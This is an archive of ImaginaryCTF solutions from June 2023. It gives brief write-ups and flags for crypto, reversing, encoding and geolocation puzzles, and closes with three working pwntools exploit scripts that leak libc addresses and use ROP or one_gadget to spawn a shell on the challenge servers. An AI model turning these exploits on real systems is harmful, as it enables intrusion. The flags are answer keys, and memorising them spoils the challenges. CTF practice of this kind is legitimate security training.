Archived Challenges - June 2023

solve...

ictf{w3lcom3_to_r0und_35!}

From https://geohints.com/Cars, you can see that the car in the picture is the one used in Kenya. Looking at the map for a bit, we notice there are not many bridges in Kenya, and looking at https://en.wikipedia.org/wiki/List_of_bridges_in_Kenya we see it really is a short list. Finding these bridges on street view we notice the picture is taken on Kilifi Bridge. Then we just move around until the picture matches what you see in street view.

ictf{-3.6361846,39.8485131}

breakpoint() spawns a debug prompt, which executes code like a python REPL.

ictf{0h_1_m1ss3d_s0m3th1ng_d1dnt_1}

Decode the base64, the magic bytes indicate that it's a zip file. Unzip it to get the flag.

ictf{z1ps_r3vealed_with_m4gic_byt3s}

ct = b'~3x|*${~1}^*tt{I~K$tv/"w"t/*tz{)~{.{z%ytty*(}~zzt-'
ct = ct[::2] + ct[::-2]

alphabet = bytes(range(32, 127))

key = ct[0] - ord('i')
print(bytes(alphabet[(alphabet.index(i) - key)%len(alphabet)] for i in ct))

Just a caesar cipher, but the characters are alternate between the first and last character to encode.

ictf{I_finally_fixed_the_weird_offset_by_64_thing}

Use ECB cut and paste to get arbitrary command execution, and leak the flag char by char by comparing it with a precomputed table of encrypt(key, PADDING + char)

https://imaginaryctf.org/f/kzT9T#solve.py

ictf{maybe_ecb_is_not_a_good_idea}

Use the Fermat attack on RSA to factor n (https://wiremask.eu/articles/fermats-prime-numbers-factorization/). This is doable because the primes are close together.

ictf{just_your_typical_rsa_challenge}

Addition takes precedence over XOR in order of operations, so actually the equation is (69*x)^(2+42*x+314159265358) and the spacing is decieving.

At some point I gave up and threw it into Z3 which of course gave me the flag.

https://imaginaryctf.org/f/aVMaZ#solve.py

ictf{why_does_addition_take_precedence_over_xor_that_threw_me_off}

Hastad's broadcast attack.

# solve.py
# query server twice for values n0,n1,c0,c1

n0 = ...
n1 = ...
c0 = ...
c1 = ...
from sympy.ntheory.modular import crt
from gmpy2 import iroot
from Crypto.Util.number import long_to_bytes

m2 = crt([n0,n1],[c0,c1])[0]
print(long_to_bytes(iroot(m2,2)[0]))

ictf{hAstaD_str1k3s_aGa!n18230842989032184879028542848403284098329048218985284104801}

import textwrap
a='1100 ... 1110100'
print(b"ictf{"+long_to_bytes(int("00".join(textwrap.wrap(a,6)),2))+b"}")```

ictf{293379041573118045942178062455891115683939605429063126250374632854}

Use a decompiler to recover the python code. Note that the function

th_markov_mistery
```retrieves the most likely state and that the the most likely state values were replaced with the flags letter. The decrypt function might be something like:
```python
def decrypt(flag_dictionary):
    flag = ""
    for i in range(1, len(flag_dictionary) + 1):
        # get the transition matrix from the dictionary format of transition_dictionary is:
        # {"state": row of transition matrix, ...}
        # states are the keys in flag_dictionary[i]
        states = [state for state in flag_dictionary[i]]
        # print(states)
        transition_matrix = np.zeros((len(flag_dictionary[i][states[0]]), len(flag_dictionary[i][states[0]])))
        for l in range(len(states)):
            transition_matrix[l] = flag_dictionary[i][states[l]]
        values = th_markov_mistery(transition_matrix)
        # print(values)
        # get the highest value in the dictionary
        highest = max(values)
        # get the index of the highest value
        for k in range(len(states)):
            if values[k] == highest:
                flag += states[k]
        # print(flag)
    return flag

ictf{0h_d4mn_m4rk0v_ch41n5_4r3nt_th4t_b4d}

Without calling srand, the randomness is seeded with 0, so the entire thing is deterministic. With that you figure out what order the functions get called in. Then reverse all of them to see the constraints of each character. Alternatively, check the status bit after each character and brute char by char.

ictf{r4nd0m_1s_th3_fl4g_0df3d3}

The flag checker uses int64 overflow on 4 8-byte long flag parts to obtain 4 factors which it then multiplies and checks if it is the inverse of 0x2E456811A8B164A5 modulo 2**64. The inverse itself is a composite number with 4 unique prime factors, the order of which can be brute forced to obtain the 4 flag parts.

ictf{ov3rfl0win_to_n0nz3roEsszz}

from pwn import *

context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")
conn = remote('eth007.me', 42092)

rop = ROP(elf)
rop.puts(elf.got.gets)
rop.main()

conn.sendline(b'a'*88 + rop.chain())
conn.recvuntil(b'Search results:\n')
libc.address = u64(conn.recvline()[:-1] + b'\0\0') - libc.sym.gets

rop = ROP(libc)
rop.raw(rop.ret)
rop.system(next(libc.search(b'/bin/sh')))
conn.sendline(b'a'*88 + rop.chain())

conn.interactive()```

ictf{shells_are_basically_bones_right?}

from pwn import *
import time

context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")
#conn = process()
#gdb.attach(conn)
conn = remote("eth007.me", 42021)

conn.sendline(b"dev" + p64(elf.got.read))
conn.recvuntil(b"Search results:")
conn.sendline(b"\x80")
conn.recvuntil(b"Search results:\n")
libc.address = u64(conn.recvline()[:-1] + b'\0\0') - libc.sym.read
print(hex(libc.address))

conn.sendline(b'a'*80 + p64(elf.bss(0x500)) + p64(libc.address+0xefcf1))

conn.interactive()

ictf{one_gadget_to_rule_them_all_b12da2c1}

Leak the libc address by bruteforcing byte by byte, then ret2one_gadget. I used this one_gadget because the requirements were met, but the shell dies shortly after spawning so you have to send the "cat flag.txt" with the script. 0x104e01 posix_spawn(rdi, "/bin/sh", rdx, 0, r8, r9)

from pwn import *
import time

#context.log_level = 'debug'
context.binary = elf = ELF("./vuln_patched")
libc = ELF("./libc.so.6")
#conn = process()
#gdb.attach(conn)
conn = remote("eth007.me", 42111)

conn.sendline(b"dev" + p64(elf.got.puts)[:3])
conn.recvuntil(b"Search results:")
addr = b'\x10'
for _ in range(5):
  for n in range(1,256):
    if n == 10:
      continue
    conn.sendline(addr + bytes([n]))
    conn.recvuntil(b"Search results:\n")
    a = conn.recvline()
    if not b"Found 0 matches" in a:
      addr += bytes([n])
      print(addr)
      break

libc.address = u64(addr + b'\0\0') - libc.sym.puts
print(hex(libc.address))

conn.sendline(b'gon' + b'a'*85 + p64(libc.address+0x104df7)[:6])
conn.sendline(b"    cat flag.txt")

conn.interactive()

ictf{defeat3d_the_b0nes_once_ag41n}